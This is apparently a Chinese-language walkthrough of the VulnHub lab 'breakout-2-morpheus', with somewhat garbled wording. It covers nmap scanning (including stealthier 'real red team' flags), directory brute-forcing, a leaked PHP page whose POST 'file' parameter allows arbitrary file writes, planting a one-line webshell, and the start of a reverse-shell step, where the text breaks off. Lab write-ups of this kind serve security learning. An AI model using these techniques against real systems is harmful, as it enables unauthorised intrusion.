vulnhub靶场breakout-2-morpheus

breakout-2-morpheus

本地假造机摆设，攻击机Kali(IP:10.1.1.128)
主机发现

1. nmap -sn -T4 10.1.1.0/24

复制代码

确定目标主机IP地点10.1.1.130
端口扫描

TCP端口扫描

1. nmap --min-rate 10000 -p- 10.1.1.130 -oA nmap_output/ports

复制代码

1. --min-rate 最低速率，由于本地虚拟机部署，无需考虑被封杀和资源消耗

复制代码

实战红队中：

1. nmap -sS -n -Pn -T2 --max-rate 2000 --max-retries 2 -p- 10.1.1.130 -oA nmap_output/ports

复制代码

1. -sS        半开扫描，并伪造源IP地址
2. -n        不使用DNS解析
3. -Pn        不做存活探测
4. -T        指定扫描速率，不指定默认为T3（1~5，数字越大扫描越快）
5. --max-rate        最大速率
6. --max-retries        最大尝试次数
7. -oA        三种格式（全格式）输出结果进行保存

复制代码

开放端口：22，80，81
端口具体信息扫描

1. nmap -sS -n -Pn -p 22,80,81,1 -sV -sC -O 10.1.1.130 -oA nmap_output/detail

复制代码

1. 1        指定一个处于关闭状态下的端口。如端口：1，在判断操作系统的时候，需要用开放的端口和关闭的端口进行比对
2. -p        指定端口
3. -sV        服务版本探测
4. -sC        使用nmap默认脚本扫描
5. -O        对操作系统进行识别探测

复制代码

UDP端口扫描

1. nmap -sU --top-ports 100 10.1.1.130 -oA nmap_output/udp

复制代码

毛病脚本扫描

1. nmap --script=vuln -p22,80,81 10.1.1.130 -oA nmap_output/vuln

复制代码

信息总结

1. OS:Linux 4.15 - 5.19
2. TCP端口开放:
3. 22                OpenSSH 8.4p1 Debian 5 (protocol 2.0)
4. 80                Apache httpd 2.4.51 ((Debian))
5. 81                nginx 1.18.0        401 Authorization Required
6. UDP端口开放:目前无实际利用价值
7. 常见漏洞信息：无
8. 80端口web服务有robots.txt文件
9. /robots.txt

复制代码

WEB

欣赏器检察

1. http://10.1.1.130:80

复制代码

有一行提示，大抵意思是已经锁定了SSH用户，以是推断目标固然开放了22端口，大概不答应举行长途SSH登录，突破口的战略将其放置到末了
检察网页源代码，并生存唯一的照片

图片隐写

检察图片隐写，无内容
robots.txt

没有使用代价
目次爆破

1. gobuster dir -u http://10.1.1.130 -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

复制代码

观察了欣赏器插件wappalyzer

并没有发现web端的技能栈是什么，以是穷举一下，美满gobuster扫描，指定常见的文件后缀名

1. gobuster dir -u http://10.1.1.130 -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x php,jsp,asp,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

复制代码

发现graffiti.txt和graffiti.php                graffiti 涂鸦
欣赏器访问这2个文件

提交数据抓包

发现提交数字1，生存在graffiti.txt文件中

恣意文件写入

修改一下参数，是否能使用graffiti.php文件

后端源代码走漏

返回包直接走漏了graffiti.php后端源代码

1. <h1>
2. <center>
3. Nebuchadnezzar Graffiti Wall
5. </center>
6. </h1>
7. <p>
8. <h1>
9. 
   
11. <center>
12. 
    
14. Nebuchadnezzar Graffiti Wall
15. 
    
18. 
    
20. </center>
21. 
    
23. </h1>
24. 
    
26. <p>
27. 
    
29. <?php
30. 
    
33. 
    
35. $file="graffiti.txt";
36. 
    
38. if($_SERVER['REQUEST_METHOD'] == 'POST') {
39. 
    
41.     if (isset($_POST['file'])) {
42. 
    
44.        $file=$_POST['file'];
45. 
    
47.     }
48. 
    
50.     if (isset($_POST['message'])) {
51. 
    
53.         $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
54. 
    
56.         fwrite($handle, $_POST['message']);
57. 
    
59.         fwrite($handle, "\n");
60. 
    
62.         fclose($file);
63. 
    
65.     }
66. 
    
68. }
69. 
    
72. 
    
74. // Display file
75. 
    
77. $handle = fopen($file,"r");
78. 
    
80. while (!feof($handle)) {
81. 
    
83.   echo fgets($handle);
84. 
    
86.   echo "
    
87. \n";
88. 
    
90. }
91. 
    
93. fclose($handle);
94. 
    
96. ?>
97. 
    
99. <p>
100. 
     
102. Enter message:
103. 
     
105. <p>
106. 
     
108. <form method="post">
109. 
     
111. <label>Message</label><input type="text" name="message">
112. 
     
114. <input type="hidden" name="file" value="graffiti.txt">
115. 
     
117. <button type="submit">Post</button>
118. 
     
120. </form>
121. 
     
123. 1
124. 
     
126. 
     
128. <p>
129. Enter message:
130. <p>
131. <form method="post">
132. <label>Message</label><input type="text" name="message">
133. <input type="hidden" name="file" value="graffiti.txt">
134. <button type="submit">Post</button>
135. </form>

复制代码

归去访问graffiti.php文件，发现提交的message参数值也同步表现了

那么直接在graffiti.php写入一句话木马
[code][/code]

验证一下是否剖析

乐成实行php代码
实行体系下令

反弹shell

kali自带php反弹shell脚本文件
/usr/share/webshells/php/php-reverse-shell.php
[code]